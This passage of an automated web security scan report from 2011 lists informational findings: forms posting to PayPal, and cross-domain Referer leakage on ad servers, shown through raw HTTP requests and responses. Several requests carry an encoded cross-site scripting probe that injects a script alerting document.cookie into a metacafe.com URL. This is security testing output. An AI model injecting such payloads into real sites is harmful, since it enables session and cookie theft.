HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:41 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 01:05:18 GMT
ETag: "3cac22e-4440-48c68360aaf80"
Accept-Ranges: bytes
Content-Length: 17472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
</p>
   <form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick" />
...[SNIP]...

17.2. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:16 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
</p>

<form name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

18. Cross-domain Referer leakage
There are 49 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


18.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=7083343476988375 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 12:49:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4978

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CLKC9KDn1fTR9QEQ2AUYWjIIvi89mH3q5uw">
...[SNIP]...
6client%3Dca-pub-2867713193962996%26adurl%3Dhttp://shop.nordstrom.com/c/new-stores-rack%253Fcm_ven%253Drack%2526cm_cat%253Dannapolis_nso%2526cm_pla%253Dgoogle%2526cm_ite%253D728x90_shopping_spree_ver"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CLKC9KDn1fTR9QEQ2AUYWjIIvi89mH3q5uw" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBFIaoaB3RTd-bOuf_lQfhneSwCrP5qpUCg4363ymTkPSsQwAQARgBIJTzyhY4AFDnsOGXA2DJhoWJiKSEELIBEHd3dy5tZXRhY2FmZS5jb226AQk3Mjh4OTBfYXPIAQTaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MeABBJgCtAu4AhjAAgHIAuuylx_gAgDqAgo5OTE1Mzc3NTM2kAPgA5gD4AOoAwH1AwAAAITgBAE%26num%3D1%26sig%3DAGiWqtzcEA3XmqpHJIpR2dQqEMm42lJIEg%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp://shop.nordstrom.com/c/new-stores-rack%253Fcm_ven%253Drack%2526cm_cat%253Dannapolis_nso%2526cm_pla%253Dgoogle%2526cm_ite%253D728x90_shopping_spree_ver" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.metacafe.com/fplayer/%253F4702d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ebe96a23f3a3%253D1%26hl%3Den%26client%3Dca-pub-2867713193962996%26adU%3Dshop.nordstrom.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHep4_U_zJEwg0rvba2TitU8m1R0A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.2. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 12:52:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 537

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><iframe id='ab79c633' name='ab79c633' src='http://d.tradex.openx.com/afr.php?zoneid=4408&amp;cb=INSERT_RANDOM_NUMBER_HERE' frameborder='0' scrolling='no' width='728' height='90'><a href='http://d.tradex.openx.com/ck.php?n=a7feacb4&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://d.tradex.openx.com/avw.php?zoneid=4408&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a7feacb4' border='0' alt='' /></a>
...[SNIP]...

18.3. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 12:52:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4368

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe src="http://view.atdmt.com/COM/iview/285952721/direct;wi.300;hi.250/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrwXH9h3RTc7hO4b2lAfr4vmUCfjo9tQBiKHvmxzyn-b8AwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0yODY3NzEzMTkzOTYyOTk2sgEQd3d3Lm1ldGFjYWZlLmNvbboBCjMwMHgyNTBfYXPIAQnaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MZgCsgXAAgHIAubpuAvgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2eoAwH1AwAAAITgBAGABpG6trfLsvz3Sw%26num%3D1%26sig%3DAGiWqtx_Iomlu9mCZTvmsPS82Ewo2V9C3Q%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%2526redirectURL%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250"><script language="JavaScript" type="text/javascript">
...[SNIP]...
gDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%26redirectURL%3Dhttp://clk.atdmt.com/COM/go/285952721/direct;wi.300;hi.250/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/285952721/direct;wi.300;hi.250/01/" /></a></noscript></iframe>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=TdEd9gAO8M4K5TsGkp5xaxwSSvDKE_7Qi7O2DA&ex_uid=4_CAESELxIVtdmt3dKafs3FT8t4Q0&creativeID=76103&message=eJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=41&exchange_id=4' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>
...[SNIP]...

18.4. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=7083343476988375 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 12:49:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4582

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
m/nexus/%23utm_campaign%3Dus" onFocus="ss('go to www.google.com/nexus','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('go to www.google.com/nexus','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKCfj6HJmPC06gEQrAIY-gEyCMKe-mOicrn-" border="0" width="300" onload="(function(that){function c(b,a,d){if(b&&a)if(b.height>0){a.style.top=b.height-a.offsetHeight;a.style.visibility='visible'}else setTimeout(function(){c(b,a,d*2)},d)}c(that,document.getElementById('abgc'),10);})(this);" /></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.metacafe.com/fplayer/%253F4702d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ebe96a23f3a3%253D1%26hl%3Den%26client%3Dca-pub-3949928662970161%26adU%3Dwww.google.com/nexus%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFU80rI991LD_4hLFdjDcDWvMfB3w" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.5. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B6d73f27533380ecb%3B12ff8dd2e5c,0%3B%3B%3B2381065140,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAAFS7d-C8BAAAAAAAAADUzNTk2ZWY0LTdmYmItMTFlMC1iMGUwLTlmMzlhM2ZiOTE3NgAdjgEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550335? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8277
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:52:21 GMT
Expires: Mon, 16 May 2011 12:52:21 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->

<!-- Code auto-generated on Mon Apr 11 15:07:45 EDT 2011 -->

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,http%3a%2f%2fwww22.verizon.com/Residential/Bundles/MarketingLanding/triple_play/triple_play%3Ffiostype%3Dfios1%26CMP%3DBAC-MXT_D_Q2_FT_S_Q_N_Z734"><img src="http://s0.2mdn.net/2993653/acq_fios_3x_BringHomeAltCA_national_standard_728x90_20110417_Sports.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5384441&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62171182&advid=2993653&sid=1037707&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1296/pixel.gif?e=100&v=noscript"/></noscript>

18.6. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0244.rm.bf1
Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux!1mR[!!!!#=!o!b!2$8S!!!!#<y'ui"; path=/; expires=Wed, 15-May-2013 12:52:16 GMT
Set-Cookie: vuday1=^cl!`NDf0(d)(<w; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=Y%rwY(3p6)LPwl1; path=/; expires=Mon, 16-May-2011 13:52:16 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:16 GMT
Pragma: no-cache
Content-Length: 5144
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

new function() {
this.rand = Math.floor((Math.random() + "") * 1000000000000);
this.dvparams = 'ctx=741233&cmp=5384441&plc=62171182&sid=1037707';
this.dvregion = '0';
this.tagsrc = '<IFRAME SRC="http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<scr'+'ipt language=\'Javascr'+'ipt1.1\' SRC="http://ad.doubleclick.net/adj/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B
...[SNIP]...
<NOscr'+'ipt>\n<A HREF="http://ad.doubleclick.net/jump/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie4;abr=!ie5;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?">\n<IMG SRC="http://ad.doubleclick.net/ad/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie4;abr=!ie5;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
</scr'+'ipt>' );
